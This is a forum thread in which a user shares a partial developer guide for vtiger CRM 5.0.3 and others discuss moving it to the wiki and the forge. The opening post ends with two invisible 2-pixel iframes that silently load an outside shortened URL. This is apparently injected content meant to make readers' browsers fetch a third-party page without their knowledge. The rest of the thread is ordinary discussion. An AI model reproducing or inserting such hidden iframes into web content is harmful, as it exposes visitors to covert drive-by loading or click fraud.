Development Documentation Forum

Hello everyone,

A while back I started working on the development guide for 5.0.3. Its has been a while and haven't had a chance to progress further although I still hope to complete this guide eventually.

Unfortunately this is only for the headers thus far. Hope you find this useful.

If anyone has any additional documentation, snipets, etc, they wish to contribute, I would be honoured to work on completing this guide for this superb application.

Enjoy. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

  • hi patryk,

    glad to hear about your work on the development documentation.

    with the screenshot, i must say, it looks greatl

    would be nice if you can share your work in progress copies with us (developer-mailing list/forge). i'm sure lot of vtiger developers would provide you more support.

    regards,

  • hi prasad!

    no question i will be more than happy to share the progress. which method would be preferred? mailing list or the forge?

    at this point, i actually have been going over your documentation (v0.3) and trying to make sense of all of it. i hope to send you updates soon.

    as for the current document, everything else i have is only fragments at this point.

    the most challenging aspect at this point is modifying the correct files, versus the database.

    take care,
    patryk
  • hi,

    nice work.

    can you put this into the wiki or somewhere where it is easier to find and download?
    after another 1000... forum messages, this place in the forum will be difficult to find.

    thanks for the good documentation,

    klaus
  • hi patryk,

    i have created the following page:
    <!-- m --><a class="postlink" href="http://wiki.vtiger.com/index.php/vtiger_crm_5.0.3_developer_guide">http://wiki.vtiger.com/index.php/vtiger ... oper_guide</a><!-- m -->

    can be reached from <!-- m --><a class="postlink" href="http://wiki.vtiger.com">http://wiki.vtiger.com</a><!-- m --> developer zone section and i have marked it as in progress.

    please feel free to signup to wiki.vtiger.com and edit the page.

    as klaus points out:
    can you put this into the wiki or somewhere where it is easier to find and download? after another 1000... forum messages, this place in the forum will be difficult to find.

    its a good idea to create a forge project and make the downloads available as and when the documentation is ready for review. once it is in a good state point the download from wiki.

    whenever there is a download available for review, kindly post it on the forums and developer list (both places)

    all the best for your work <!-- s:) --><img src="{smilies_path}/icon_smile.gif" alt=":)" title="smile" /><!-- s:) -->

  • i have posted a link in the 'vtiger crm 5 developer guide' accessible via the community tab above or here.

    as well the project is registered on the forge. once available, i will upload the images there as well.

    prasad, will this be something the vtiger team could assist me with in the support portal?

    thanks in advance,

    patryk.
  • hi patryk,

    i have update the page: <!-- m --><a class="postlink" href="http://wiki.vtiger.com/index.php/vtiger_crm_5.0.3_developer_guide">http://wiki.vtiger.com/index.php/vtiger ... oper_guide</a><!-- m -->

    our support team will not be able to provide assistance via support portal owing to workload and their involvement in the product. sorry for that.

    we will certainly be a part of the discussion when you post on the developer list and i'm sure our community developers will be ready to share the knowledge they have gained so far.

    regards,
    prasad

  • hi prasad,

    i noticed the update. thank you.

    as for support via the portal, thats no problem, this is why i had to make sure.

    thanks again!

  • what tool do you use to create such wonderful map? it is a very nice map.
  • hi james

    thank you so much for the compliment, really appreciate it. i created this using a vector drawing application called xara xtreme. i've been a graphic artist for quite sometime now aside from anything else thats digital <!-- s:) --><img src="{smilies_path}/icon_smile.gif" alt=":)" title="smile" /><!-- s:) -->

    i hope to post some more pages soon.
